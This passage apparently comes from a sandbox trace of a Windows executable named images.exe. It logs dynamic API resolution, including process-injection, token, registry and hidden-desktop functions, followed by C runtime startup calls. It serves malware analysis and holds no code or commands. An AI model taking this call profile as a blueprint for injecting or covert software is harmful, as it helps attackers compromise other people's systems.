lpProcName="SetUnhandledExceptionFilter") returned 0x74caa940 [0284.990] GetProcAddress (hModule=0x74c90000, lpProcName="SignalObjectAndWait") returned 0x74cd25e0 [0284.990] GetProcAddress (hModule=0x74c90000, lpProcName="SleepConditionVariableSRW") returned 0x75bf7fb0 [0284.990] GetProcAddress (hModule=0x74c90000, lpProcName="SleepEx") returned 0x74cb67f0 [0284.990] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleA") returned 0x74ca99f0 [0284.990] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcAddress") returned 0x74ca78b0 [0284.990] GetProcAddress (hModule=0x74c90000, lpProcName="SystemTimeToTzSpecificLocalTime") returned 0x74cb5c30 [0284.990] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateJobObject") returned 0x74cdbf40 [0284.991] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateProcess") returned 0x74cb5100 [0284.991] GetProcAddress (hModule=0x74c90000, lpProcName="TlsAlloc") returned 0x74caa120 [0284.991] GetProcAddress (hModule=0x74c90000, lpProcName="TlsFree") returned 0x74caa040 [0284.991] GetProcAddress (hModule=0x74c90000, lpProcName="TlsGetValue") returned 0x74ca1b70 [0284.991] GetProcAddress (hModule=0x74c90000, lpProcName="TlsSetValue") returned 0x74ca29d0 [0284.991] GetProcAddress (hModule=0x74c90000, lpProcName="TransactNamedPipe") returned 0x74cd2600 [0284.991] GetProcAddress (hModule=0x74c90000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77783650 [0284.991] GetProcAddress (hModule=0x74c90000, lpProcName="UnhandledExceptionFilter") returned 0x74cd2670 [0284.991] GetProcAddress (hModule=0x74c90000, lpProcName="UnlockFileEx") returned 0x74cb6c90 [0284.992] GetProcAddress (hModule=0x74c90000, lpProcName="UnmapViewOfFile") returned 0x74ca9b20 [0284.992] GetProcAddress (hModule=0x74c90000, lpProcName="UnregisterWaitEx") returned 0x74caf310 [0284.992] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAllocEx") returned 0x74cd2730 [0284.992] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualFree") returned 0x74ca7600 [0284.992] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualFreeEx") returned 0x74cd2750 [0284.992] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtectEx") returned 0x74cd2790 [0284.992] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualQuery") returned 0x74ca7a90 [0284.992] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualQueryEx") returned 0x74cd27b0 [0284.992] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForSingleObject") returned 0x74cb6820 [0284.993] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForSingleObjectEx") returned 0x74cb6830 [0284.993] GetProcAddress (hModule=0x74c90000, lpProcName="WaitNamedPipeW") returned 0x74cb5e70 [0284.993] GetProcAddress (hModule=0x74c90000, lpProcName="WakeAllConditionVariable") returned 0x777c8d70 [0284.993] GetProcAddress (hModule=0x74c90000, lpProcName="Wow64GetThreadContext") returned 0x74cd3e30 [0284.993] GetProcAddress (hModule=0x74c90000, lpProcName="WriteConsoleW") returned 0x74cb7020 [0284.993] GetProcAddress (hModule=0x74c90000, lpProcName="WriteFile") returned 0x74cb6ca0 [0284.993] GetProcAddress (hModule=0x74c90000, lpProcName="WriteProcessMemory") returned 0x74cd2850 [0284.993] GetProcAddress (hModule=0x74c90000, lpProcName="lstrlenW") returned 0x74ca3690 [0284.993] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleFileNameA") returned 0x74caa720 [0284.994] GetProcAddress (hModule=0x74c90000, lpProcName="CreateFileW") returned 0x74cb6890 [0284.994] GetProcAddress (hModule=0x74c90000, lpProcName="GetConsoleMode") returned 0x74cb6f70 [0284.994] GetProcAddress (hModule=0x74c90000, lpProcName="GetConsoleCP") returned 0x74cb6f60 [0284.994] GetProcAddress (hModule=0x74c90000, lpProcName="FlushFileBuffers") returned 0x74cb69b0 [0284.994] GetProcAddress (hModule=0x74c90000, lpProcName="GetStringTypeW") returned 0x74ca7950 [0284.994] GetProcAddress (hModule=0x74c90000, lpProcName="FindResourceExW") returned 0x74ca8ca0 [0284.994] GetProcAddress (hModule=0x74c90000, lpProcName="FreeEnvironmentStringsW") returned 0x74caa7e0 [0284.994] GetProcAddress (hModule=0x74c90000, lpProcName="GetEnvironmentStringsW") returned 0x74caaac0 [0284.994] GetProcAddress (hModule=0x74c90000, lpProcName="GetCommandLineW") returned 0x74caaba0 [0284.995] GetProcAddress (hModule=0x74c90000, lpProcName="GetCPInfo") returned 0x74caa290 [0284.995] GetProcAddress (hModule=0x74c90000, lpProcName="GetOEMCP") returned 0x74cb5140 [0284.995] GetProcAddress (hModule=0x74c90000, lpProcName="FindNextFileA") returned 0x74cb6980 [0284.995] GetProcAddress (hModule=0x74c90000, lpProcName="FindFirstFileExA") returned 0x74cb6930 [0284.995] GetProcAddress (hModule=0x74c90000, lpProcName="FindClose") returned 0x74cb68e0 [0284.995] GetProcAddress (hModule=0x74c90000, lpProcName="GetFileType") returned 0x74cb6aa0 [0284.995] GetProcAddress (hModule=0x74c90000, lpProcName="GetACP") returned 0x74ca8500 [0284.996] GetProcAddress (hModule=0x74c90000, lpProcName="GetStdHandle") returned 0x74caa6e0 [0284.996] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleExW") returned 0x74caa2b0 [0284.996] GetProcAddress (hModule=0x74c90000, lpProcName="ExitProcess") returned 0x74cb7b30 [0284.996] GetProcAddress (hModule=0x74c90000, lpProcName="GetSystemInfo") returned 0x74caa0f0 [0284.996] GetProcAddress (hModule=0x74c90000, lpProcName="FreeLibrary") returned 0x74ca9f50 [0284.996] GetProcAddress (hModule=0x74c90000, lpProcName="GetSystemTimeAsFileTime") returned 0x74ca7620 [0284.996] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcessId") returned 0x74ca23e0 [0284.996] GetProcAddress (hModule=0x74c90000, lpProcName="GetStartupInfoW") returned 0x74caa740 [0284.996] GetProcAddress (hModule=0x74c90000, lpProcName="CreateEventW") returned 0x74cb66b0 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="CloseHandle") returned 0x74cb6630 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcess") returned 0x74ca38c0 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="EncodePointer") returned 0x777bf730 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="SwitchToThread") returned 0x74caa690 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleW") returned 0x74ca9bc0 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtect") returned 0x74ca7a50 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAlloc") returned 0x74ca7810 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentThreadId") returned 0x74ca1b90 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="Sleep") returned 0x74ca7990 [0284.997] GetProcAddress (hModule=0x74c90000, lpProcName="SetEvent") returned 0x74cb67d0 [0284.998] GetProcAddress (hModule=0x74c90000, lpProcName="DeleteCriticalSection") returned 0x777b0e60 [0284.998] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSectionEx") returned 0x74cb6740 [0284.998] GetProcAddress (hModule=0x74c90000, lpProcName="LeaveCriticalSection") returned 0x7779f210 [0284.998] GetProcAddress (hModule=0x74c90000, lpProcName="EnterCriticalSection") returned 0x7779f290 [0284.998] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcessHeap") returned 0x74ca7710 [0284.998] GetProcAddress (hModule=0x74c90000, lpProcName="HeapSize") returned 0x7778bb20 [0284.998] GetProcAddress (hModule=0x74c90000, lpProcName="HeapFree") returned 0x74ca1ba0 [0284.998] GetProcAddress (hModule=0x74c90000, lpProcName="HeapReAlloc") returned 0x7778efe0 [0284.999] GetProcAddress (hModule=0x74c90000, lpProcName="HeapAlloc") returned 0x77792bd0 [0284.999] GetProcAddress (hModule=0x74c90000, lpProcName="HeapDestroy") returned 0x74cb4c30 [0284.999] GetProcAddress (hModule=0x74c90000, lpProcName="SetLastError") returned 0x74ca2af0 [0284.999] GetProcAddress (hModule=0x74c90000, lpProcName="GetLastError") returned 0x74ca3870 [0284.999] GetProcAddress (hModule=0x74c90000, lpProcName="RaiseException") returned 0x74ca8c20 [0284.999] GetProcAddress (hModule=0x74c90000, lpProcName="DecodePointer") returned 0x777bd830 [0284.999] GetProcAddress (hModule=0x74c90000, lpProcName="SuspendThread") returned 0x74caef60 [0284.999] GetProcAddress (hModule=0x74c90000, lpProcName="GetCommandLineA") returned 0x74caab60 [0284.999] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75830000 [0285.000] GetProcAddress (hModule=0x75830000, lpProcName="SetThreadToken") returned 0x75840f50 [0285.000] GetProcAddress (hModule=0x75830000, lpProcName="SetSecurityInfo") returned 0x758505f0 [0285.000] GetProcAddress (hModule=0x75830000, lpProcName="SetKernelObjectSecurity") returned 0x75852d10 [0285.000] GetProcAddress (hModule=0x75830000, lpProcName="SetEntriesInAclW") returned 0x75852bf0 [0285.000] GetProcAddress (hModule=0x75830000, lpProcName="RevertToSelf") returned 0x7584fc20 [0285.000] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExW") returned 0x7584f7f0 [0285.000] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryValueExW") returned 0x7584f330 [0285.001] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExW") returned 0x7584f350 [0285.001] GetProcAddress (hModule=0x75830000, lpProcName="RegDisablePredefinedCache") returned 0x758511d0 [0285.001] GetProcAddress (hModule=0x75830000, lpProcName="ConvertStringSidToSidW") returned 0x7584ddc0 [0285.001] GetProcAddress (hModule=0x75830000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x7584cbe0 [0285.001] GetProcAddress (hModule=0x75830000, lpProcName="ConvertSidToStringSidW") returned 0x7584f060 [0285.001] GetProcAddress (hModule=0x75830000, lpProcName="AccessCheck") returned 0x75851230 [0285.001] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExA") returned 0x75850a20 [0285.001] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExA") returned 0x7584f790 [0285.002] GetProcAddress (hModule=0x75830000, lpProcName="RegEnumKeyExA") returned 0x75851810 [0285.002] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteKeyA") returned 0x758504a0 [0285.002] GetProcAddress (hModule=0x75830000, lpProcName="RegCreateKeyExA") returned 0x7584fa60 [0285.002] GetProcAddress (hModule=0x75830000, lpProcName="RegCloseKey") returned 0x7584f620 [0285.002] GetProcAddress (hModule=0x75830000, lpProcName="SetTokenInformation") returned 0x75853840 [0285.003] GetProcAddress (hModule=0x75830000, lpProcName="SystemFunction036") returned 0x74482a60 [0285.003] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x749b0000 [0285.003] GetProcAddress (hModule=0x749b0000, lpProcName="GetTextExtentPoint32A") returned 0x74a5cf10 [0285.003] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77660000 [0285.003] GetProcAddress (hModule=0x77660000, lpProcName="CoAddRefServerProcess") returned 0x77550d30 [0285.004] GetProcAddress (hModule=0x77660000, lpProcName="CoReleaseServerProcess") returned 0x77553950 [0285.004] GetProcAddress (hModule=0x77660000, lpProcName="CoCreateInstance") returned 0x77500060 [0285.004] GetProcAddress (hModule=0x77660000, lpProcName="StringFromCLSID") returned 0x7752dcf0 [0285.004] GetProcAddress (hModule=0x77660000, lpProcName="CoTaskMemFree") returned 0x774d9170 [0285.004] GetProcAddress (hModule=0x77660000, lpProcName="CoInitialize") returned 0x77691930 [0285.004] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x755e0000 [0285.004] GetProcAddress (hModule=0x755e0000, lpProcName=0xa2) returned 0x75605250 [0285.005] GetProcAddress (hModule=0x755e0000, lpProcName=0xa1) returned 0x755f38b0 [0285.005] GetProcAddress (hModule=0x755e0000, lpProcName=0x115) returned 0x755f4910 [0285.005] GetProcAddress (hModule=0x755e0000, lpProcName=0x7) returned 0x755f2640 [0285.005] GetProcAddress (hModule=0x755e0000, lpProcName=0x6) returned 0x755f9d40 [0285.005] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c70000 [0285.005] GetProcAddress (hModule=0x75c70000, lpProcName="CommandLineToArgvW") returned 0x75e1bf80 [0285.005] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetFolderPathW") returned 0x75e14e80 [0285.005] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetKnownFolderPath") returned 0x75e19710 [0285.006] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetFileInfoA") returned 0x75e28c50 [0285.006] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x756d0000 [0285.006] GetProcAddress (hModule=0x756d0000, lpProcName="CharNextA") returned 0x756fe240 [0285.006] GetProcAddress (hModule=0x756d0000, lpProcName="ShowWindow") returned 0x75708e60 [0285.006] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0285.006] GetProcAddress (hModule=0x756d0000, lpProcName="DestroyWindow") returned 0x757092b0 [0285.006] GetProcAddress (hModule=0x756d0000, lpProcName="PostThreadMessageA") returned 0x75704810 [0285.006] GetProcAddress (hModule=0x756d0000, lpProcName="GetDlgItem") returned 0x756fcc40 [0285.006] GetProcAddress (hModule=0x756d0000, lpProcName="AllowSetForegroundWindow") returned 0x75704b10 [0285.007] GetProcAddress (hModule=0x756d0000, lpProcName="ReleaseDC") returned 0x756eba40 [0285.007] GetProcAddress (hModule=0x756d0000, lpProcName="GetDC") returned 0x75708990 [0285.007] GetProcAddress (hModule=0x756d0000, lpProcName="EnableWindow") returned 0x757029d0 [0285.007] GetProcAddress (hModule=0x756d0000, lpProcName="IsWindowVisible") returned 0x75705960 [0285.007] GetProcAddress (hModule=0x756d0000, lpProcName="SendMessageA") returned 0x756fa220 [0285.007] GetProcAddress (hModule=0x756d0000, lpProcName="RegisterClassW") returned 0x756e9800 [0285.007] GetProcAddress (hModule=0x756d0000, lpProcName="PostMessageW") returned 0x756ed700 [0285.007] GetProcAddress (hModule=0x756d0000, lpProcName="IsWindow") returned 0x756e8f70 [0285.007] GetProcAddress (hModule=0x756d0000, lpProcName="GetWindowThreadProcessId") returned 0x756eda50 [0285.008] GetProcAddress (hModule=0x756d0000, lpProcName="GetUserObjectInformationW") returned 0x75708fa0 [0285.008] GetProcAddress (hModule=0x756d0000, lpProcName="GetThreadDesktop") returned 0x75709110 [0285.008] GetProcAddress (hModule=0x756d0000, lpProcName="GetProcessWindowStation") returned 0x75708b10 [0285.008] GetProcAddress (hModule=0x756d0000, lpProcName="GetMessageW") returned 0x75704f60 [0285.008] GetProcAddress (hModule=0x756d0000, lpProcName="FindWindowExW") returned 0x75704110 [0285.008] GetProcAddress (hModule=0x756d0000, lpProcName="DispatchMessageW") returned 0x756e62e0 [0285.008] GetProcAddress (hModule=0x756d0000, lpProcName="DefWindowProcW") returned 0x777eaee0 [0285.008] GetProcAddress (hModule=0x756d0000, lpProcName="CreateWindowStationW") returned 0x7572c280 [0285.008] GetProcAddress (hModule=0x756d0000, lpProcName="CreateWindowExW") returned 0x756e9860 [0285.009] GetProcAddress (hModule=0x756d0000, lpProcName="CreateDesktopW") returned 0x7572c200 [0285.009] GetProcAddress (hModule=0x756d0000, lpProcName="CloseWindowStation") returned 0x75709430 [0285.009] GetProcAddress (hModule=0x756d0000, lpProcName="CloseDesktop") returned 0x75709340 [0285.009] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0285.162] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0285.214] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff64 | out: lpSystemTimeAsFileTime=0x19ff64*(dwLowDateTime=0xcbfbc682, dwHighDateTime=0x1d86dce)) [0285.214] GetCurrentThreadId () returned 0xfa4 [0285.214] GetCurrentProcessId () returned 0xfa0 [0285.214] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff5c | out: lpPerformanceCount=0x19ff5c*=2213205141933) returned 1 [0285.214] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0285.216] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0285.216] GetProcAddress (hModule=0x75ac0000, lpProcName="InitializeCriticalSectionEx") returned 0x75b7d740 [0285.216] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0285.216] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsAlloc") returned 0x75b84490 [0285.216] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsSetValue") returned 0x75b7d7a0 [0285.218] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0285.218] GetProcAddress (hModule=0x75ac0000, lpProcName="InitializeCriticalSectionEx") returned 0x75b7d740 [0285.218] GetProcessHeap () returned 0x8a0000 [0285.218] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0285.219] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsAlloc") returned 0x75b84490 [0285.219] GetLastError () returned 0xcb [0285.219] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsGetValue") returned 0x75b6f350 [0285.219] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsSetValue") returned 0x75b7d7a0 [0285.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x364) returned 0x8b0eb8 [0285.221] SetLastError (dwErrCode=0xcb) [0285.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0xc00) returned 0x8b1228 [0285.223] GetStartupInfoW (in: lpStartupInfo=0x19fe98 | out: lpStartupInfo=0x19fe98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0285.223] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0285.223] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0285.223] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0285.223] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\" " [0285.224] GetCommandLineW () returned="\"C:\\ProgramData\\images.exe\" " [0285.225] GetACP () returned 0x4e4 [0285.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x220) returned 0x8b1e30 [0285.225] IsValidCodePage (CodePage=0x4e4) returned 1 [0285.225] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19feb8 | out: lpCPInfo=0x19feb8) returned 1 [0285.225] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f780 | out: lpCPInfo=0x19f780) returned 1 [0285.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0285.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f518, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0285.225] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x19f794 | out: lpCharType=0x19f794) returned 1 [0285.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0285.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0285.227] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0285.227] GetProcAddress (hModule=0x75ac0000, lpProcName="LCMapStringEx") returned 0x75b695f0 [0285.227] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0285.227] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f2b8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0285.227] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x19fc94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x12Ám\x87Ðþ\x19", lpUsedDefaultChar=0x0) returned 256 [0285.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0285.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 